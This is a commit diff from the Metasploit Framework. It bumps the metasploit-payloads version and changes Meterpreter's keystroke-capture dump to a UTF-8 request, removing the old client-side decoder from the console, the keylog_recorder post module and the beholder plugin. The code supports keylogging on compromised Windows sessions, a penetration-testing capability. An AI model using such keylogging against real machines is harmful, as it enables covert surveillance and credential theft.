Land #8237, modernize and improve reliability of keystroke capture with meterpreter

Gemfile.lock

@@ -44,7 +44,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.2.22)
+      metasploit-payloads (= 1.2.23)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.1.8)
       msgpack
@@ -222,7 +222,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.22)
+    metasploit-payloads (1.2.23)
     metasploit_data_models (2.0.14)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

lib/rex/post/meterpreter/extensions/stdapi/ui.rb

@@ -226,43 +226,11 @@ class UI < Rex::Post::UI
   # Dump the keystroke buffer
   #
   def keyscan_dump
-    request  = Packet.create_request('stdapi_ui_get_keys')
+    request  = Packet.create_request('stdapi_ui_get_keys_utf8')
     response = client.send_request(request)
     return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
   end
 
-  #
-  # Extract the keystroke from the buffer data
-  #
-  def keyscan_extract(buffer_data)
-    outp = ""
-    buffer_data.unpack("n*").each do |inp|
-      fl = (inp & 0xff00) >> 8
-      vk = (inp & 0xff)
-      kc = VirtualKeyCodes[vk]
-
-      f_shift = fl & (1<<1)
-      f_ctrl  = fl & (1<<2)
-      f_alt   = fl & (1<<3)
-
-      if(kc)
-        name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
-        case name
-        when /^.$/
-          outp << name
-        when /shift|click/i
-        when 'Space'
-          outp << " "
-        else
-          outp << " <#{name}> "
-        end
-      else
-        outp << " <0x%.2x> " % vk
-      end
-    end
-    return outp
-  end
-
 protected
   attr_accessor :client # :nodoc:
 

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb

@@ -39,7 +39,7 @@ class Console::CommandDispatcher::Stdapi::Ui
       "enumdesktops"  => [ "stdapi_ui_desktop_enum" ],
       "getdesktop"    => [ "stdapi_ui_desktop_get" ],
       "idletime"      => [ "stdapi_ui_get_idle_time" ],
-      "keyscan_dump"  => [ "stdapi_ui_get_keys" ],
+      "keyscan_dump"  => [ "stdapi_ui_get_keys_utf8" ],
       "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
       "keyscan_stop"  => [ "stdapi_ui_stop_keyscan" ],
       "screenshot"    => [ "stdapi_ui_desktop_screenshot" ],
@@ -313,7 +313,7 @@ class Console::CommandDispatcher::Stdapi::Ui
   def cmd_keyscan_dump(*args)
     print_line("Dumping captured keystrokes...")
     data = client.ui.keyscan_dump
-    print_line(client.ui.keyscan_extract(data))
+    print_line(data)
 
     return true
   end

metasploit-framework.gemspec

@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.2.22'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.2.23'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8'
   # Needed by msfgui and other rpc components

modules/post/windows/capture/keylog_recorder.rb

@@ -243,7 +243,7 @@ class MetasploitModule < Msf::Post
   #
   # @return [void] A useful return value is not expected here
   def write_keylog_data
-    output = session.ui.keyscan_extract(session.ui.keyscan_dump)
+    output = session.ui.keyscan_dump
 
     if not output.empty?
       print_good("Keystrokes captured #{output}") if datastore['ShowKeystrokes']

plugins/beholder.rb

@@ -127,7 +127,7 @@ class Plugin::Beholder < Msf::Plugin
         return
       end
 
-      collected_keys = sess.ui.keyscan_extract(sess.ui.keyscan_dump)
+      collected_keys = sess.ui.keyscan_dump
       store_keystrokes(sid, collected_keys)
     end